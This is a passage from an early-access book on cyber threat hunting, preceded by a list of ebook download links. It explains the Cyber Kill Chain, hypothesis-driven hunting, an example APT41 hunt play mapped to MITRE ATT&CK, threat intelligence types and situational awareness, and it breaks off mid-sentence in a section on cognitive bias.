Cyber Threat Hunting (MEAP V05)

Nadhem Alfardan
Visit to download the full and correct content document:
https://ebookmeta.com/product/cyber-threat-hunting-meap-v05-nadhem-alfardan/
More products digital (pdf, epub, mobi) instant
download maybe you interests ...

Security Operations Center Building Operating and

Maintaining your SOC 1st Edition Joseph Muniz Gary
Mcintyre Nadhem Alfardan

https://ebookmeta.com/product/security-operations-center-
building-operating-and-maintaining-your-soc-1st-edition-joseph-
muniz-gary-mcintyre-nadhem-alfardan/

Cyber Threat Intelligence, 2023 Edition Martin Lee

https://ebookmeta.com/product/cyber-threat-
intelligence-2023-edition-martin-lee/

Cyber Threat Intelligence 2023 Edition Edition Martin

Lee

https://ebookmeta.com/product/cyber-threat-
intelligence-2023-edition-edition-martin-lee/

Cybersecurity and Third Party Risk Third Party Threat

Hunting 1st Edition Gregory C. Rasner

https://ebookmeta.com/product/cybersecurity-and-third-party-risk-
third-party-threat-hunting-1st-edition-gregory-c-rasner/
Big Data Analytics and Intelligent Systems for Cyber
Threat Intelligence 1st Edition Yassine Maleh

https://ebookmeta.com/product/big-data-analytics-and-intelligent-
systems-for-cyber-threat-intelligence-1st-edition-yassine-maleh/

Cloud Defense Strategies with Azure Sentinel: Hands-on

Threat Hunting in Cloud Logs and Services 1st Edition
Marshall Copeland

https://ebookmeta.com/product/cloud-defense-strategies-with-
azure-sentinel-hands-on-threat-hunting-in-cloud-logs-and-
services-1st-edition-marshall-copeland/

Cyber Threat Intelligence: The No-Nonsense Guide for

CISOs and Security Managers 1st Edition Aaron Roberts

https://ebookmeta.com/product/cyber-threat-intelligence-the-no-
nonsense-guide-for-cisos-and-security-managers-1st-edition-aaron-
roberts/

Cyber Threat Intelligence: The No-Nonsense Guide for

CISOs and Security Managers 1st Edition Aaron Roberts

https://ebookmeta.com/product/cyber-threat-intelligence-the-no-
nonsense-guide-for-cisos-and-security-managers-1st-edition-aaron-
roberts-2/

Learning C++ (MEAP V05) Michael Haephrat

https://ebookmeta.com/product/learning-c-meap-v05-michael-
haephrat/
Cyber Threat Hunting MEAP V05
1. Copyright_2023_Manning_Publications
2. welcome
3. 1_Introduction_to_Threat_Hunting
4. 2_Building_the_Foundation_of_a_Threat_Hunting_Practice
5. 3_Your_First_Threat_Hunting_expedition
6. 4_Threat_Intelligence_for_Threat_Hunting
7. 5_Hunting_in_Clouds
8. 6_Using_Fundamental_Statistical_Constructs
9. 7_Tuning_Statistical_Logic
10. 8_Unsupervised_Machine_Learning_with_K-Means
MEAP Edition Manning Early Access Program Cyber Threat Hunting
Version 5

Copyright 2023 Manning Publications

©Manning Publications Co. We welcome reader comments about anything in
the manuscript - other than typos and other simple mistakes. These will be
cleaned up during production of the book by copyeditors and proofreaders.
https://livebook.manning.com/#!/book/cyber-threat-hunting/discussion

For more information on this and other Manning titles go to manning.com

welcome
Thanks for purchasing the MEAP of Cyber Threat Hunting. The book takes
you through a journey to become a successful threat hunter. In this book, I
share my experience of threat hunting to help you establish a practical threat
hunting framework, understand the mindset of threat hunters, and live the
hunting experience by conducting real-life threat hunt expeditions.

Throughout the book, we will be covering various data sources, data sets, and
techniques to design and conduct threat hunting. We show how hunters can
use standard searches, statistics, and machine learning as analytic techniques
to conduct threat hunt expeditions.

I first take you through the fundamentals of threat hunting, how to build a
practical threat hunting framework, and establish a maturity road for your
threat hunting program.

I then take you through the process of conducting threat hunt expeditions
using a scenario-based approach, covering different real-life topics and
scenarios. You will get the opportunity to learn and practice threat hunting
using different data sets and techniques. You will gain access to templates
and processes that I hope will be of value to your career and inspiration as a
threat hunter.

To get the best out of the book, you need to have basic knowledge and
experience in managing security controls, networking concepts, operating
systems, and performing searches in data stores.

Please let me know your thoughts in the liveBook discussion forum on what I
wrote so far and what you would like to see in the rest of the book.

Thanks again for your interest and for purchasing the MEAP. Good luck,
hunters!

Nadhem Al Fardan
In this book

Copyright 2023 Manning Publications welcome brief contents 1 Introduction

to Threat Hunting 2 Building the Foundation of a Threat Hunting Practice 3
Your First Threat Hunting expedition 4 Threat Intelligence for Threat
Hunting 5 Hunting in Clouds 6 Using Fundamental Statistical Constructs 7
Tuning Statistical Logic 8 Unsupervised Machine Learning with K-Means
1 Introduction to Threat Hunting
The chapter introduces the Cyber Kill Chain and provides an overview of the
cyber security threat landscape and how threat hunting can tackle complex
cyber security challenges. The chapter describes the thought process behind
threat hunting, laying down fundamental concepts of a successful threat
hunting practice. The chapter draws the differences and highlights the
similarities between threat hunting and threat detection. The chapter ends
with an overview of the core tools that threat hunters use.

The book defines cyber threat hunting as follows:

Definition

Cyber threat hunting is a human-centric security practice that takes a

proactive approach to uncover threats that evaded detection tools or threats
that have been detected but dismissed or undermined by humans.

The chapter covers the following topics:

The stages of the Cyber Kill Chain

How threat hunters uncover cyber threats that went unnoticed by
detection tools, equipped with the right set of skillset and tools.
The similarities and differences between cyber threat hunters and
farmers (security analysts) and how hunting and detection services
complement each other.
The hypothesis-driven approach that the threat hunting process takes
The characteristic of a successful threat hunter and a threat hunting
practice
The set of core tools that threat hunters require to conduct hunting
expeditions

Let us start with an overview of the cybersecurity threat landscape and show
why threat hunting is essential.
1.1 Cybersecurity Threat Landscape
Today's cyber threat landscape is complex, constantly evolving, and diverse.
Threat actors, ranging from organized cybercrime to state-sponsored groups,
actively improve existing attack techniques and tools and create new ones to
reliably establish and quickly move through the Cyber Kill Chain
(https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-
chain.html), starting from reconnaissance to actions on objectives.

The Cyber Kill Chain developed by Lockheed Martin, shown in Figure 1.1,
describes the set of stages that adversaries typically go through to achieve
their final objective(s). The Cyber Kill Chain consists of seven stages.

1. Reconnaissance: the attacker assesses the situation to identify potential

attack targets and tactics. For example, an attacker harvests social media
accounts or performs an active vulnerability scan on publicly accessible
applications.
2. Weaponization: the attacker develops the code to exploit vulnerabilities
or weaknesses that the reconnaissance stage uncovered. For example,
preparing a phishing email, formulating a SQL injection code, or
preparing malware code.
3. Delivery: the attacker uses the delivery vectors to send the weaponized
payload. For example, an attacker uses email to deliver malware code.
4. Exploitation: the attacker executes the code she created in the
weaponization stage.
5. Installation: the attacker creates a channel that allows her to reach the
compromised system.
6. Command and Control: the attacker establishes a command-and-
control channel (C2) with an external server. For example, an attacker
uses Twitter as a covert command and control channel to communicate
with compromised systems.
7. Actions on Objective: the attacker fulfills the objective(s) of the attack.
For example, an attacker encrypts files on the endpoint in the case of a
ransomware attacker.

Figure 1.1 Lockheed Martin Cyber Kill Chain

A popular meme in cyber security, credited to Dmitri Alperovitch, states,
"there are only two types of companies: those that know they've been
compromised, and those that don't know." Threat hunting allows
organizations to take a proactive approach in which they assume that they
have been hacked and can uncover evidence of that.

We now have some idea about the complexity of the security threat
landscape; let us dig into essential concepts of threat hunting and describe its
relevance and importance.

1.2 Why Hunt?

There is no perfect cybercrime. Adversaries would leave clues and a trail of
evidence when executing one or more of the cyber kill chain stages.

Advanced adversaries have shifted from using noisy attacks that trigger
security alarms to more stealthy ones that leave a small footprint and trigger
minimal alerts, if any, going unnoticed by automated detection tools.
According to a SANS published report (https://www.sans.org/webcasts/stop-
nasty-malware-pre-post-execution-review-ensilo-endpoint-security-platform-
106690), "the evolution of threats such as file-less malware, ransomware,
zero days and advanced malware, combined with security tools getting
bypassed, poses an extensional risk to enterprises."

The increased threat actors' sophistication in operating in covert nature and

their ability to launch attacks with minimal chances of detection are driving
organizations to think beyond their standard detection tools. The change in
the adversary behavior requires defenders to establish proactive capabilities
such as threat hunting and deploy advanced analytics using statistics and
machine learning. For example, hunters can regularly search for potential
data exfiltration activities through Domain Name Service (DNS) by applying
volume-based statistical analytics without waiting or relying on network
security tools such as intrusion detection systems to generate security alerts.

Organizations rely on the threat hunter's skills to uncover the above threats
during threat hunt expeditions, resulting in reduced dwell time and increased
cyber resilience. The dwell time is the time between an attacker's initial
penetration of an organization's environment (threat first successful execution
time) and the point at which the organization finds out the attacker (threat
detection time).

In addition to reducing the dwell time, running threat hunting expeditions

introduces other security benefits to the organization, such as

Identifying gaps in security prevention and detection capabilities

Tuning existing security monitoring use cases
Identifying new security monitoring use cases
Identifying vulnerabilities that assessment activities did not uncover
Identifying misconfiguration in systems and applications, which might
impact security, operation, and compliance

To capture the above list of benefits, organizations need to establish and

operate a robust threat hunting process that clearly describes the threat
hunting expeditions' inputs and outputs. The book helps you establish a
robust threat hunting program using practical examples and providing
templates.

Now that we established the need for a proactive approach to uncover cyber
security threats let us describe how to structure a threat hunt.

1.3 Structuring Threat Hunting

Threat hunting takes a hypothesis-driven investigation approach. A
hypothesis is a proposition that is consistent with known data but has been
neither verified nor shown to be false. A good hypothesis should be relevant
to the organization environment and testable in terms of the availability of
data and tools. Taking a hypothesis-based approach is referred to as
structured threat hunting.

On the other hand, unstructured threat hunting refers to activities in which

hunters analyze data at their disposal to search for anomalies without a pre-
defined hypothesis. For example, the hunter might process and visualize data
to look for unexpected changes in patterns such as noticeable spikes or dips.
Finding such changes can lead the hunter to investigate further to uncover
undetected threats. In this book, we focus on structured threat hunting, but we
do not discourage you from exploring data without a formal hypothesis from
time to time.

The following is an example of a threat hunt hypothesis:

Hypothesis

An adversary has gained access to one or more of the organization's

Microsoft Windows endpoints. PowerShell is one of the tools used by the
adversary to perform unauthorized activities.

Now that we understand what a hypothesis is, let us discuss how to come up
with one.

1.3.1 Coming up with a Hypothesis

The threat landscape associated with the environment you try to protect
should drive what hypothesis to create and execute. Different sources
concerning threats and their relevance to the environment can assist you in
understanding the threat landscape. Threat hunters translate this
understanding to hypotheses. The following are examples of such sources:

Internal and external threat intelligence sources

The results of threat modeling exercises
The results of red team exercises
Reviewing existing threat standards and frameworks such as MITRE
ATT&CKT®
 Analysis of previous or current security incidents

1.3.2 Testing the Hypothesis

It is the job of the threat hunter to test the hypothesis using the best resources
available at the hunter's disposal. Testing the hypothesis can start by defining
a manageable list of activities that can uncover the first set of evidence or
indicators concerning the hypothesis or guide the hunters to subsequent
searches. For example, the following activities are relevant to the previously
stated hypothesis.

Hunting for suspicious PowerShell activities could reveal the existence of the
compromise, proving the hypothesis. The successful execution of the
following may uncover evidence of compromise:

1. Suspicious encoded PowerShell command

2. Suspicious execution of unsigned PowerShell scripts without warning
3. A process with suspicious PowerShell arguments
4. Suspicious PowerShell parent process

When conducting a hunt, there are three possible outcomes

1. Hypothesis proven: the analysis of the data collected during the hunt
expedition confirms the correctness of the hypothesis. In this case, the
hunt expedition uncovered a security incident.
2. Hypothesis disproven: the analysis of the data collected during the hunt
expedition confirms the incorrectness of the hypothesis. In this case, the
hunt expedition could not uncover a security incident.
3. Inconclusive: there is still insufficient information to either prove or
disprove the hypothesis. This outcome could be due to various reasons
such as insufficient data, inappropriate tools, and scope limitations.

1.3.3 Executing the Threat Hunt

Executing a threat hunt might take an hour or might go for a week, depending
on several factors such as:
 1. Initial suspicious activities: the number of initial use cases to execute
in search for the first set of clues
2. Data: the amount of data to search in, the complexity of the search, and
the tools' performance. For example, running a search against 1TB of
data on hot storage (disks with high input/output operations per second)
would be much faster than running the exact search on cold storage
(disks with low input/output operations per second).
3. Threat complexity: sophisticated attacks might be associated with the
like of Advanced Persistent Threats (APTs) that require a longer time,
which might, in many cases, takes weeks or even months to investigate
thoroughly. This is not to say that the hunt will last for months, but to
state that the hunt part would take longer than average.
4. Access to data and systems: not gaining timely access to systems or
data in the middle of a hunt expedition can prolong the hunt duration.
For example, not providing the hunter timely access to the available
network flows maintained by a different team would waste time and
force the hunter to eventually wait or find more expensive and less
reliable options or end with an inconclusive hunt outcome.

Failing to prove the hypothesis does not necessarily mean that the threat does
not exist. It means that the hunter could not uncover the threat with the
skillset, data, and tools available.

The book focuses on structured that hunting, in which the threat hunter,
working with other security team members to define and prove a hypothesis,
targeting adversaries' Tactics, Techniques, and Procedures (TTPs).

The organization's threat hunting maturity level should improve over time.
There are many lessons the hunter will learn from the hunt expeditions. The
book provides practical lessons on how to plan, build and operate an effective
threat hunting program.

Now we have a good idea about threat hunting; let us compare it with threat
detection, a fundamental security monitoring service, and draw differences
and highlight similarities.

1.4 Threat Hunting vs Threat Detection

Detection is tool-driven, while hunting is human-driven. In hunting, the
hunter takes center stage, compared to tools having that role in the world of
detection. Threat hunting relies heavily on the experience of the threat hunter
for defining the hypothesis, looking for evidence in a vast amount of data,
and continuously pivoting in search of the evidence of compromise. Threat
hunting does not replace threat detection technologies; they are
complementary.

Threat detection refers to the reactive approach in which Security Operation

Center (SOC) analysts respond to security alerts generated by tools. For
example, SOC analysts would triage and investigate a security event
generated by an Endpoint Exposure and Response (EDR) tool or a security
alert generated by a Security Event and Information Management (SIEM)
system.

SOC analysts attend to security alerts detected and reported by security tools
and perform triage and investigation of security incidents. Figure 1.2 shows
at a high level the threat detection process, in which SOC analysts would
primarily perform cyber threat farming. Like farmers, SOC analysts generally
wait for alerts (ripe crops) to show up on a dashboard to triage and respond to
(harvest and process.) On the other hand, hunting takes a proactive approach.
Hunters take the lead by going out in the hunting field to conduct
expeditions, equipped with the right mindset, experience, situational
awareness, and the right set of tools they require for an expedition.

Figure 1.2 Threat Detection High-Level Process

Detection is an essential SOC service. Addressing deficiencies in the security

monitoring service should be a top priority while establishing or outsourcing
a threat hunting capability. Organizations should not consider establishing a
threat hunting program to offload the work from the security monitoring team
to threat hunters.

Detection and hunting should work together to deliver a better coverage of

the cyber threat landscape. Detection and hunting interact and, in some
instances, overlap. There will always be cases where detection is an input to a
threat hunt and vice versa. For example, a threat hunter might build a
hypothesis that considers a widespread system compromise based on few
suspicious activities detected on one or more endpoints and observed by the
security monitoring team.

Detection and hunting can use the same or different analytic techniques to
detect or hunt for malicious activities. For example, user behavior analytic
tools deploy statistical analysis and machine learning to detect and report
anomalous user behavior to the security monitoring team. Hunters can make
use of similar techniques for cyber threat hunting. Although hunters would
not lead the development of machine learning models, they must understand
and apprehend the capabilities and limitations of the different analytic
techniques.

Threat hunters are highly skilled resources. Let us have a look at the set of
skills that threat hunters possess.

1.5 The Background of a Threat Hunter

A threat hunter is a cyber security specialist who proactively and interactively
seeks to uncover attacks or threats that evaded detection technologies
deployed in various places in the network.

Successful threat hunters are curious, prepared to tackle new challenges, and
equipped with a good understanding of their hunting field. As a threat hunter,
you will face challenges such as the unavailability of data, slow searches,
improper event parsing, old technologies, incomplete or not access systems.
The hunter should raise these challenges during and after a hunt expedition.
Some of these challenges might get addressed in a reasonable time, while
others might take a long time or might not get addressed at all, especially
ones that involve financial investments. These challenges should not prevent
the hunters from finding new ways to enhance the effectiveness of the threat
hunts by looking at other data and systems and tune the techniques the hunter
deploys. Hunters are resourceful.

An offensive mindset gives the hunter an advantage in creating effective

threat hunt plays and executing threat hunt expeditions.

During a hunt expedition, not being able to prove the hypothesis should not
discourage a hunter. It is a common outcome that can be due to various
reasons, including

The attack or the threat described in the hypothesis does not exist in the
first place
The Hunter might not yet have the full context about the environment.
For example, running a threat hunt against a newly deployed set of
systems and applications might prove to be challenging when running
the hunt.
The Hunter might not yet have the skill set required to uncover
sophisticated attacks against technologies that the hunter is not very
familiar with. For example, running a threat hunt expedition against a
private Kubernetes environment while the hunter is unfamiliar with
containerized deployments.
Lack of data required to the hunter to perform better investigations
The use of inappropriate techniques to uncover sophisticated attacks.
For example, running basic searches to uncover advanced persistent
threats (APTs) have their limitations.

As a threat hunter, you cannot be expected to know everything. Successful

threat hunters spend an ample amount of time to research and, in many cases,
try new Tactics, Techniques, and Procedures (TTPs.) Cyber security is a
dynamic landscape, and having valuable research time would enhance the
chances of uncovering advanced TTPs.

As a threat hunter, understanding the threat hunting process is essential. Let

us take a look at the threat hunting process.
1.6 Threat Hunting Process
Defining a process helps threat hunters establish, conduct, and continuously
improve the overall threat hunting practice and the individual threat hunt
plays, increasing, over time, the probability of uncovering threats. Not only
does it help improve the quality of threat hunts, but the process also
incorporates other values that threat hunting introduces to the organization,
such as updating existing or developing new detection and threat intelligence
content.

Figure 1.3 shows in a high-level the threat hunting process, which starts by
formalizing a hypothesis, followed by trying to prove the hypothesis. If the
hunter could not prove the hypothesis, then try to improve it by updating the
hypothesis details and searching again for the threat. If proven, then the threat
has been uncovered. The hunter does not stop there; expand the scope and
search for indicators on other systems to understand the attack's magnitude
and spread. The hunter would then engage the incident response team and
document and share new content that would be helpful to the security
monitoring and threat intelligence team.

Figure 1.3 Threat Hunting High-Level Process

The following are the threat hunting process steps:

Formulate a hypothesis: define the hypothesis based on inputs collected

from sources and activities such as threat modeling outcomes, TTPs
received from internal and external threat intelligence providers, or
simply searching for tactics and techniques described in standard
frameworks such MITRE ATT&CKT®. For example, the organization’s
threat intelligence team might track adversary groups such as APT 29
(https://www.fireeye.com/current-threats/apt-groups.html), targeting
Western European governments, foreign policy groups, and similar
organizations. The hunter can formulate hypotheses based on relevant
tactics and techniques deployed by the group. Before moving into the
next step, the hunter needs to answer the following questions:
What activities does the threat hunter need to look for to prove the
hypothesis?
What data does the threat hunter need to access?
How big is the data?
How much time will the searches take? How can the threat hunter,
with the help of platform specialists, optimize the searches?
 What tools should the threat hunter use?
Look for it in the environment: search for indicators and evidence that
can prove the hypothesis
If not proven, optimize and go back: optimize the threat hunt by
increasing the scope of the hunt, requesting further access to data to
systems, updating the search activities, or updating the hypothesis itself.
If proven, pivot and expand the scope: The hypothesis is proven. The
hunter researches the extent of the security incident by expanding the
scope of the hunt.
Improve existing or develop new detection and threat intelligence
content: now that the hypothesis is proven, the threat hunter may
recommend new security monitoring detection rules and updates the
threat intelligence content by sharing indicators or TTPs.
Engage the incident response team: now that the hypothesis is proven,
raise a ticket and assign it to the team that handles the incident response.
Depending on the complexity of the incident, the hunter would provide
support to the incident handling team.

Note

In Chapter 2, we present and describe a detailed version of the hunting

process.

Note

It is important to note that although structured hunting involves following an

initial lead or clue, hunters should expect many pivots and side quests.

Now that we understand the threat hunting process let us examine the tools
used to execute the "look for threat in the environment" step.

1.7 Overview of Technologies and Tools

Although threat hunting is human-centric, having access to relevant and
reliable technologies and scalable and flexible tools is critical to the success
of the threat hunter. Events and activities can be collected from endpoints and
network elements and forwarded to data stores to be accessed and searched.
Alternatively, the hunter might require access to artifacts and events directly
from data sources to perform search and investigation activities.

Core technologies and tools that hunters would have in their toolset

Endpoint activities on servers and clients: access to process

executions, network ports, registry details (in Windows), and system
access events is a standard requirement for most hunts, whether for
initial use cases or during a hunt. OSQuery is an example of a tool that
provides threat hunters with access to various endpoint telemetry data.
The tool allows the hunter to write Structured Query Language (SQL)
queries to explore operating system data. Some of the open-source and
commercial EDR tools have similar built-in capabilities.
Datastores: a place that provides long-term events storage and searches.
For example, it is common to send events collected from different
sources in the network to a data store such as Splunk or Elasticsearch,
which are available to the security monitoring team and threat hunters.
Analytics: facilitates scalable searches with tools such as Splunk or
Elasticsearch or advanced functions such as statistics and machine
learning with platforms such as Apache Spark.

Depending on the environment and the scope of the hunt, the hunter’s toolset
would contain other tools. For example, a hunter might use YARA rules to
research and capture suspicious activities on endpoints or push snort rules to
network security tools such as intrusion detection systems to capture network
activities of interest.

The book describes and provides examples of different open-source and

commercial tools that threat hunters use and how to utilize the tools to
conduct threat hunts.

1.8 Summary
Structured threat hunting is a hypothesis-driven practice that proactively tries
to uncover threats that were not detected or threats that have been detected
but dismissed or undermined by humans. Understanding the mindset of a
threat hunter and the threat hunting process is crucial to becoming a
successful threat hunter.
2 Building the Foundation of a
Threat Hunting Practice
This chapter covers
How to develop a threat hunting hypothesis
How to document a threat hunt play
The importance of threat intelligence to threat hunting
Building a threat hunting framework
The detail of the threat hunting process
Threat hunting role and responsibilities
Important frameworks and standards
How to evaluate the maturity of a threat hunting practice

In Chapter 1, we established foundational threat hunting concepts. In this

chapter, we discuss how to create a threat hunting framework. We start with
an overview of existing frameworks and standards and how and where they
cover the topic of threat hunting. For example, we discuss how and where a
standard like NIST Special Publication 800-53 Rev 5 covers threat hunting
and how a framework like MITRE ATT&CK can be used to establish hunts
based on threat tactics, techniques and procedures.

We then describe how to start a hunting practice and improve its maturity
over time, supplying you with processes and templates to kickstart the work.
We then describe the general role and responsibilities of the threat hunter
using a responsible, accountable, consulted, and informed model.

Finally, we describe data sources and their importance to threat hunting and
provide an overview of common data sources and sets such as Windows
events, Sysmon, Linux events, network flows and firewall events.

Let us start by defining essential concepts and roles that we would refer to in
this chapter and the rest of the book.
2.1 Threat Hunting Definitions
Threat hunting is a human-centric security practice that takes a
proactive approach to uncover threats that evaded detection tools such as
automated, rule- and signature-based security systems or threats that
have been detected but dismissed or undermined by humans.
A hypothesis is a proposition that is consistent with known data but has
been neither verified nor shown to be false.
A threat hunter is a role taken by a cyber security specialist who
proactively and interactively seeks to uncover attacks or threats that
evaded detection technologies deployed in various places in the
network.
Situational awareness refers to understanding the business, the
supporting technology environment and the internal and external cyber
threats associated with this environment.
A threat actor refers to a person, a group or an organization driven by
different motives to conduct malicious intents.

Now that we have defined some essential threat hunting-related concepts and
roles, let us construct our first hunt play.

2.2 Developing a Threat Hunting Hypothesis

A hypothesis is a proposition that is consistent with known data but has been
neither verified nor shown to be false. To start a structured hunt, you should
first determine what to hunt for and what format to use to describe it, i.e.,
answer the question "how to come up with a reasonable hypothesis and how
to document a threat hunt play?"

2.2.1 Threat Scenario

Imagine the threat intelligence team sharing with you that a threat group
referred to as APT41 is now a top actor in their threat watchlist. Construct a
threat hunt play to uncover this group’s activities when using shell-based
techniques against Microsoft Active Directory (AD).
Note

This scenario considers a known threat actor that the threat intelligence team
considers relevant to the environment. There will be other cases in which the
actors and campaign are unknown, and you would rely on your experience,
data, and tools to uncover them. It takes time to build maturity, so let us start
with this scenario.

2.2.2 The Threat Hunt Play

We need to create a threat hunt play, such as the example that will shortly
follow. The threat hunt play documents the following: title, reference
number, background about the organization and the hunt play, the hypothesis
that we try to test, the scope of the hunt, the techniques that we would start
with to trigger the hunt, along with the associated procedures and data
sources, and internal and external references relevant to the hunt play. Let us
look at the example.

Title: Hunt for APT41 activities in the Microsoft AD environment

Reference Number: Hunt-Play-APT41-01
Background: An organizational threat assessment identified APT41 as
a high-priority threat. The MITRE's ATT&CK Navigator details several
techniques attributed to this threat actor. Several of these techniques are
relevant to the organization's Microsoft Active Directory (AD)
environment.
Hypothesis: We hypothesize that the APT41 threat actor is present in
the network and that we would detect evidence of multiple techniques
deployed in a manner consistent with the group’s attack patterns.
Scope: The scope of the hunt covers the Microsoft AD servers and other
systems that make use of the Microsoft AD services.
Threat Technique:
MITRE ATT&CK T1059.001: Command and Scripting Interpreter:
PowerShell
Procedure: APT41 leveraged PowerShell to deploy malware
families in victims’ environments.
Data sources and events: Command/Command Execution,
Module/Module Load, Process/Process Creation (Security Auditing
 event 4688 and Sysmon event 1) and Script/Script Execution
Threat Technique:
MITRE ATT&CK T1059.003: Command and Scripting Interpreter:
Windows Command Shell
Procedure 1: APT41 used cmd.exe /c to execute commands on
remote machines. APT41 used a batch file to install persistence for
the Cobalt Strike BEACON loader.
Data sources and events: Command/Command Execution, and
Process/Process Creation (Security Auditing event 4688 and
Sysmon event 1)
References:
MITRE ATT&CK on APT41
(https://attack.mitre.org/groups/G0096/)
Insikt Group. (2021, February 28). China-Linked Group RedEcho
Targets the Indian Power Sector Amid Heightened Border
Tensions. Retrieved March 22, 2021.
APT41 group assessment report developed by the organization’s
threat intelligence team

Figure 2.1 Threat Hunt Play Example

Considering the threat scenario and the sample hunt play we created, let us
look at how to design, construct and document a threat hunt play.

2.2.3 Formalizing the Hunt Hypothesis

To start a structured hunt, you should first determine what to hunt for and
what format to use to describe it, i.e., answer the question "how to come up
with a reasonable hypothesis and how to document a threat hunt play?"
The hypothesis is at the center of structured threat hunting. It states what
threats may be present in the network and how to identify them. The number
of hypotheses should grow over time as the threat hunter gains better
knowledge of the environment, i.e., better situational awareness, consumes
better threat intelligence information that facilitates the creation of new threat
hunts, or simply as the number of applications and systems grows.

Over time, some threat hunts might transition to security detection rules. In
addition, there will also be cases in which some hunts might become
obsolete, for example, after decommissioning an application or a system.

The hunter should consider the following attributes when developing a

hypothesis:

Relative: the hypothesis should be relevant to the environment. The

hunter should apply situational awareness and domain expertise to drive
the development and testing of a hypothesis. Situational awareness is
gained over time, adding to the threat hunter’s experience and driving
better threat hunt design and execution. In our scenario, the threat hunter
should be familiar with how Microsoft AD works in general and its
security aspects in specific (domain expertise) and with the current
deployment of Microsoft Active Directory in the environment
(situational awareness).
Testable: it should be possible to test the hypothesis using the data and
tools available for the hunter. In our scenario, the hunter needs access to
the operating system and Microsoft AD events and tools that collect and
store these events so that the hunter can at least search for them.

The following is a format that you can use to document a threat hunting play.
The format consists of the following:

Background about the threat hunt, including information about the

threat and hunt field in scope.
A statement that describes the threat, hypothesizes that the threat exists
and that the threat hunter can uncover it.
The scope of the threat hunt describes the hunt field.
A list of techniques and indicators to look for to reveal the existence of
the threat actor. Select relevant techniques, combining information about
 the threat actor and the threat hunter’s experience and knowledge about
the environment. The threat hunter may identify corresponding MITRE
ATT&CK techniques and sub-techniques if applicable to the hypothesis.
The procedures used by the adversary to realize the techniques reveal
the existence of the threat actor. There could be multiple procedures
mapped to one technique.
The list of data sources and sets required to test the hypothesis based on
the techniques and procedures identified.
A reference section that lists internal or external documents, blogs,
artefacts relevant to the threat hunt play.

In our scenario, the threat intelligence team provided the threat hunter with a
good reason to establish one or more threat hunt plays relevant to a threat
group of interest, APT41, one of many active threat actors.

Threat intelligence is an important source that provides critical insights to

threat hunters understanding of the current threat landscape. In our scenario,
it is the threat intelligence team sharing the information about the relevance
of a threat group, APT41, as one of the threat actors to track. Let us further
describe threat intelligence and how it relates to threat hunting.

2.3 Cyber Threat Intelligence

Cyber Threat intelligence refers to the information collected and processed
and knowledge established around cyber threats by internal and external
sources to better understand and evaluate the threats that have, will, or are
currently targeting an organization, allowing it to take actions and make
informed decisions promptly. Cyber threat intelligence tries to help answer
simple but important questions such as: who would attack an organization
and how?

"Who would attack the organization, and how?" are questions that threat
intelligence analysts try to answer. To that, they research, analyze and
compile a wide range of internal and external information to identify short-
term (present) and long-term (future) attacks and threats. Threat intelligence
analysts then share the compiled version with the broader organization,
including threat hunters.
2.3.1 Threat Intelligence Types

Based on its content and how it is consumed, threat intelligence is divided

into four types: strategic, tactical, technical, and operational. The four types
are shown in Figure 2.2 and described hereafter.

Strategic cyberthreat intelligence supplies a high-level presentation of

the threat landscape suitable for executives, focusing on the impact of
threat execution.
Operational threat intelligence provides context about threats and
actors such as nature, intent, malicious activities and geopolitical
background suitable for security management members. Operational
threat intelligence provides threat hunters with the contextual
information that help them build and execute relevant hunt plays.
Tactical threat intelligence supplies details on TTPs suitable for the
SOC team in general and threat hunters in specific.
Technical threat intelligence supplies specific IOCs such as IP
addresses, hashes, and URLs suitable for machine-based consumption.
Due to the nature of the information it provides, technical threat
intelligence has a short lifespan.

Figure 2.2 Threat Intelligence Types

Threat hunters should have an overall knowledge of the four threat
intelligence types, focusing on operational and tactical threat intelligence
and easy access to technical threat intelligence.

Let us now look into how to view and process tactical and technical threat
intelligence based on their level of complexity through the lens of the
pyramid of pain model.

2.3.2 The Pyramid of Pain

The pyramid of pain model (http://detect-respond.blogspot.com/2013/03/the-
pyramid-of-pain.html), shown in Figure 2.3, takes a complexity-driven
perspective on tactical and technical threat intelligence. The higher you go on
the pyramid, the harder it gets to uncover the attacker’s characteristics. For
example, locating and tracking the activities of an IP address is generally
easier compared to uncovering the use of techniques such as invoking
rundll32.exe to execute a malicious loader.

A mature threat hunting practice would focus on the top three layers of the
pyramid of pain (network/host artifacts, tools and TTPs) to get the best value
out of threat intelligence and achieve higher levels of maturity. The bottom
three layers of the pyramid (hash values, IP addresses and domain names) are
associated with IOCs mainly consumed for security monitoring purposes.
Threat hunters would still use these IOCs, but that should not be the focus of
the threat hunting practice as a whole.

Figure 2.3 Pyramid of Pain

In addition to threat intelligence, situational awareness is key to creating

relevant hypotheses. Let us dig more into the concept of situational
awareness.

2.4 Security Situational Awareness

In the context of cyber security, situational awareness refers to understanding
1. the business, 2. the supporting technology environment that security
professionals, such as hunters, aim to protect and 3. the internal and external
cyber threats associated with this environment.

Maintaining good situational awareness is critical to making informed

security decisions when selecting, deploying and operating threat prevention,
detection, and response controls. In the context of threat hunting, situational
awareness is key to creating and conducting relevant and effective threat
hunts.

To gain better situational awareness, threat hunters should establish

knowledge on:

The organization's business, including the market it operates in and the

products and services it offers to customers.
The technology services delivered by the organization to its internal and
external consumers. For example, user directory or remote access
services.
Systems and applications used, including and not limited to the
operating systems and software used.
The location of these systems and applications. For example, the ones
hosted in an on-premises data center or ones delivered by a cloud
service provider as infrastructure as a service (IaaS), platform as a
service (PaaS) or software as a service (SaaS).
Existing prevention, detection and response security controls, including
and not limited to network security, application security, endpoint
security, infrastructure security, identity management and vulnerability
management.
Data generated by the different systems and applications, where they are
stored and how they can be accessed.
The threat landscape associated with the environment, including relevant
threat actors and TTPS that could be used or enhanced to start an attack
or establish a compromise.
Previous and current security incidents

The combination of 1. good situational awareness, 2. the threat hunter’s

experience and 3. a structured and well-resourced practice is key to reaching
a good level of threat hunting maturity.
There are situations when the threat hunting experience might hinder the
productivity and effectiveness of threat hunts. This is due to cognitive biases,
which refers to how humans’ perception of information is influenced by their
own experience and preferences. Let us discuss this in more detail in the next
section.

2.5 Cognitive Bias Challenges

According to the Handbook of Evolutionary Psychology, a cognitive bias is a
systematic pattern of deviation from norm or rationality in judgment.
Experiencing cognitive biases results from how our brains are wired to
simplify our complex world.

We all exhibited and will exhibit one form or another of cognitive biases.
Security professionals such as threat hunters should be aware of how
cognitive biases impact their decisions and judgment. There is a long list of
cognitive biases. The following are three critical ones that threat hunters
should observe and try to overcome when designing and conducting hunts.

Confirmation bias: refers to the tendency to search for or interpret

information in a way that confirms one's preconceptions and discredit
information that does not support the initial opinion. Threat hunters
